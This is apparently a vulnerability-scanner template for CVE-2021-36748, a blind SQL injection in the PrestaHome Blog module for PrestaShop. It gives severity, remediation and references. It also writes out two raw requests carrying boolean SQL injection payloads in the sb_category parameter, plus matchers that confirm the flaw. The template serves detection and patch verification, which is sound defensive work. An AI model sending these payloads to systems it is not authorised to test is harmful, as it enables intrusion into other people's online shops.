id: CVE-2021-36748 info: name: PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection author: whoever severity: high description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter. remediation: | Upgrade to PrestaShop version 1.7.8 or later, or apply the provided patch to fix the SQL Injection vulnerability. reference: - https://blog.sorcery.ie/posts/ph_simpleblog_sqli/ - https://alysum5.promokit.eu/promokit/documentation/blog/ - https://blog.sorcery.ie - https://nvd.nist.gov/vuln/detail/CVE-2021-36748 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-36748 cwe-id: CWE-89 epss-score: 0.0061 epss-percentile: 0.76291 cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:* metadata: max-request: 2 vendor: prestahome product: blog framework: prestashop tags: cve,cve2021,prestashop,prestahome,sqli,cms http: - raw: - | GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1 Host: {{Hostname}} - | GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 200" - "status_code_2 == 404" - 'contains(body_1, "prestashop")' - "contains(tolower(header_2), 'index.php?controller=404')" - "len(body_2) == 0" condition: and # digest: 4a0a0047304502210089d31e81655e780868e22803826c9f62f910bf183d9e15f5f5a3128bca8f2d05022019bda0ce9e967732f276de6ffb5369bc78431787003bed3c8d467a1e29f4c10a:922c64590222798bb761d5b6d8e72950